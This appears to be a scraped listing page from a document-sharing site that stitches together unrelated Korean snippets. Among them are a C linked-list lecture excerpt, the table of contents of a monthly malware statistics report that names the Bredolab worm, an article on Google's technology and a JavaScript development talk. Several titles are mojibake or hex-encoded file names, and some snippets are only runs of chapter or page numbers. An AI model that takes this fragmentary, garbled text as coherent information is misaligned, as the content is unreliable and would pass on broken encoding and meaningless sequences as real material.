A Hierarchical Approach to Interactive Motion Editing for Human-like Figures 단일연결리스트 (Singly Linked List) 신찬수 연결리스트 (linked list)? tail 서울부산수원용인 null item next 구조체복습 struct name_card { char name[20]; int date; } struct name_card a; // 구조체변수 a 선언 a.name 또는 a.date // 구조체 a의멤버접근 struct

More information

<4D6963726F736F667420576F7264202D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

<4D6963726F736F667420576F7264202D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378> 목차 Part Ⅰ. 2 월의 악성코드 통계 1. 악성코드 통계... 2 (1) 감염 악성코드 Top 15... 2 (2) 카테고리별 악성코드 유형... 3 (3) 카테고리별 악성코드 비율 전월 비교... 3 (4) 월별 피해 신고 추이... 4 (5) 월별 악성코드 DB 등록 추이... 4 2. 악성코드 이슈 분석 악성코드 종합 선물셋트 Bredolab Worm...

More information

01....b74........62

01....b74........62 4 5 CHAPTER 1 CHAPTER 2 CHAPTER 3 6 CHAPTER 4 CHAPTER 5 CHAPTER 6 7 1 CHAPTER 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50

More information

¾Ë·¹¸£±âÁöħ¼�1-ÃÖÁ¾

¾Ë·¹¸£±âÁöħ¼�1-ÃÖÁ¾ Chapter 1 Chapter 1 Chapter 1 Chapter 2 Chapter 2 Chapter 2 Chapter 2 Chapter 2 Chapter 3 Chapter 3 Chapter 3 Chapter 3 Chapter 3 Chapter 3 Chapter 3 Chapter 3 Chapter 4 Chapter 4

More information

(291)본문7

(291)본문7 2 Chapter 46 47 Chapter 2. 48 49 Chapter 2. 50 51 Chapter 2. 52 53 54 55 Chapter 2. 56 57 Chapter 2. 58 59 Chapter 2. 60 61 62 63 Chapter 2. 64 65 Chapter 2. 66 67 Chapter 2. 68 69 Chapter 2. 70 71 Chapter

More information

Microsoft Word - 김완석.doc

Microsoft Word - 김완석.doc 포커스 구글의 기술과 시사점 김완석* 성낙선** 정명애*** 구글에는 전설적인 다수의 개발자들이 지금도 현역으로 일하고 있으며, 구글 창업자와 직원들이 직접 대 화하는 금요회의가 지금도 계속되고 있다. 구글은 창업자, 전설적 개발자, 금요회의, 복지 등 여러 면에서 화제와 관심의 대상이다. 이러한 화제의 구글을 기술 측면에서 이해하기 위하여 구글의 주요 기술에

More information

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일 Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 Introduce Me!!! Job Jeju National University Student Ubuntu Korean Jeju Community Owner E-Mail: ned3y2k@hanmail.net Blog: http://ned3y2k.wo.tc Facebook: http://www.facebook.com/gyeongdae

More information